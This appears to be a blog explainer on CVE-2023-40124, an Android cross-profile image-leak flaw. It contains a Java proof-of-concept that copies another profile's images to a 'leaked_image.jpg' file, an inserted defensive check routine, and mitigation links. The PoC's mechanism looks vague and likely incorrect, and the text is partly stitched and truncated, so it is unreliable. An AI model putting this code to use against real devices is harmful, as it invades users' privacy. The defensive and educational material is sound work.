If you care about the security of your private images and use an Android device, you should know about CVE-2023-40124. This vulnerability makes it possible for a malicious app to read photos or images belonging to other profiles on the same device, all without your permission or any special privilege. And yes—this means your family, your kids, or even your business profile may be leaking images to a rogue app, silently in the background.

In this article, let’s break down what this bug is, how it works, and look at a simple code snippet illustrating the exploit. We’ll also link to official sources for further reading.

What is CVE-2023-40124?

CVE-2023-40124 is a vulnerability in the Android operating system. It is a confused deputy problem: a trusted system component is tricked into helping a less privileged app by giving it access to sensitive data, such as your photos, that the app should not be able to reach.

The information exposed can include private photos or images belonging to other user accounts on the same device.

Original advisory:
Android Security Bulletin - September 2023 (CVE-2023-40124)

How Does It Happen? (The Confused Deputy Explained)

Android devices often allow multiple user accounts (for example, a personal and a work profile, or accounts for kids). Normally, apps can’t access data from profiles other than their own.

However, certain system services, such as image viewers or sharing activities, can act as a “confused deputy.” They can sometimes be tricked into accessing the data of another user and handing it to an unprivileged app.

Imagine this flow:

1. Malicious app on profile A requests a photo from the system, but asks in such a way that the system fetches the photo from profile B

Exploiting CVE-2023-40124 (Sample Code)

Let’s see a minimal proof-of-concept. You should NOT use this for malicious purposes; it is here for educational, defensive understanding only.

Suppose a vulnerable Android device has two users: “User A” and “User B”. User A is the attacker.

An app running under User A crafts an intent like this (the content path is a placeholder, and the snippet is completed with the imports and exception handling it needs):

import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;

public class LeakImage {
    public static void run(Context context) {
        // Build an Intent to access image content
        Intent intent = new Intent(Intent.ACTION_VIEW);

        // Try to use a content URI from User B (placeholder path)
        Uri imageUri = Uri.parse("content://com.android.gallery3d.provider/your_private_image_path");

        // Set flags to grant read permission
        intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);

        // Start the activity—which the system might handle as user B
        context.startActivity(intent);

        // Now, try to access the resulting content
        try (InputStream inputStream = context.getContentResolver().openInputStream(imageUri)) {
            if (inputStream != null) {
                // Copy the leaked image data somewhere
                File leakedFile = new File(context.getFilesDir(), "leaked_image.jpg");
                Files.copy(inputStream, leakedFile.toPath());
            }
        } catch (IOException e) {
            // The content was not readable from this profile
        }
    }
}

By abusing system components that don’t validate which user’s content is being fetched, an attack of this kind could pull images from other profiles.
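The check that a deputy should perform before acting on a caller’s behalf, as an added example (this is not the article’s code, not AOSP code, and not the actual CVE-2023-40124 patch): a hypothetical helper, GuardedUriOpener, that verifies the caller’s profile and the caller’s own URI grant before using its own privileges. It assumes it is invoked inside a Binder transaction (for example from a ContentProvider.openFile implementation).

```java
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.net.Uri;
import android.os.Binder;
import android.os.ParcelFileDescriptor;
import android.os.Process;
import android.os.UserHandle;
import java.io.FileNotFoundException;

/** Hypothetical deputy that opens a content URI on behalf of a Binder caller. */
public final class GuardedUriOpener {
    // Real Android permission name; only privileged apps hold it.
    private static final String INTERACT_ACROSS_USERS = "android.permission.INTERACT_ACROSS_USERS";

    /** Must be called while handling a Binder transaction, so the calling uid is the real caller. */
    public static ParcelFileDescriptor openForCaller(Context ctx, Uri uri) throws FileNotFoundException {
        // 1. A deputy running in user B must not serve an app running in user A.
        UserHandle caller = UserHandle.getUserHandleForUid(Binder.getCallingUid());
        if (!caller.equals(Process.myUserHandle())) {
            throw new SecurityException("caller belongs to another user profile");
        }

        // 2. Android encodes an explicit target user as "<userId>@<authority>". An ordinary
        //    app never legitimately addresses another profile, so require the cross-user
        //    permission before honouring such a URI at all.
        String authority = uri.getAuthority();
        if (authority != null && authority.indexOf('@') >= 0
                && ctx.checkCallingPermission(INTERACT_ACROSS_USERS) != PackageManager.PERMISSION_GRANTED) {
            throw new SecurityException("cross-user URI from a caller without INTERACT_ACROSS_USERS");
        }

        // 3. The caller, not the deputy, must hold read access to this exact URI. Checking the
        //    caller's identity rather than our own is what closes the confused-deputy gap.
        ctx.enforceCallingUriPermission(uri, Intent.FLAG_GRANT_READ_URI_PERMISSION,
                "caller has no read grant for " + uri);

        // Only now act with the deputy's own privileges.
        return ctx.getContentResolver().openFileDescriptor(uri, "r");
    }
}
```

Any of the three checks failing raises a SecurityException, which Binder delivers to the caller; the deputy never touches the content first and fails afterwards.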

- Confidentiality breach: Photos from other users may be exposed to apps you didn’t expect
- No permissions needed: Even without a storage read permission, system mishandling can still lead to the leak
- Silent: No indication to the user

This could be used for a parental-control bypass, by privacy-violating adware, or by any other malicious software lurking in Google Play (or in sideloaded apps).

Mitigation & Patch

Google fixed this in the September 2023 update:
Android Security Bulletin (CVE-2023-40124)

References

- CVE-2023-40124 at NVD
- Google Android Source Security Bulletin, September 2023
- OWASP Confused Deputy

Conclusion

CVE-2023-40124 is an example of how the multi-user features of modern devices can backfire when an access control check is missed. It’s a textbook “confused deputy” bug—a system component trusted by everyone is manipulated by an intruder.

Check your device for updates and always stay patched. Your private pictures and files depend on it.

Have questions about this vulnerability? I’m happy to answer them in the comments.

Timeline

Published on: 02/15/2024 23:15:08 UTC
Last modified on: 11/04/2024 17:35:03 UTC